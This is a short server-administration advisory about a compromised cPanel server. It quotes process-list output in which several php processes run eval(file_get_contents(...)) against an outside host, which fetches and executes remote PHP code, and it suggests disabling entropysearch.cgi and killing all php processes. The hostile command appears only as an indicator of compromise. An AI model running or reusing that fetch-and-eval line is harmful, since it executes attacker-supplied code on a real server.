If you have noticed server loaded and following process running on your server Be alert!! Something WRONG going on on your server
877082 aatwdhh 20 0 332m 3232 520 R 45.9 0.0 105:23.78 php -r eval(file_get_contents(‘http://hello. hacked. jp/hello/n.php?a=207589788&b=26786093&u=
750767 coavjuwv3 20 0 332m 6308 512 R 45.5 0.1 391:25.41 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=683074642&b=88133019&u= o
859849 anafcte 20 0 332m 7900 512 R 45.5 0.1 126:15.42 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=387327366&b=49975220&u= .
939351 baavgfmor 20 0 332m 16m 9960 R 44.8 0.2 3:57.21 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=252084665&b=32527086&u=
928864 bqcagom 20 0 332m 7928 548 R 43.6 0.1 9:23.19 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=960742077&b=123956558&u= cgi-
818841 alasdeno 20 0 332m 6588 504 R 42.9 0.1 255:40.30 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=888691102&b=114660873&u=al-
You need to get it deal as soon as possible. Fast solution would be disable the entropysearch by login into your server as root and run below command
#chmod 000 /usr/local/cPanel/cgi-sys/entropysearch.cgi
And kill all php process using killall -9 php
The load will be normal as soon as you performed above steps, we suggest you to get your server scan and get firewall level higher.
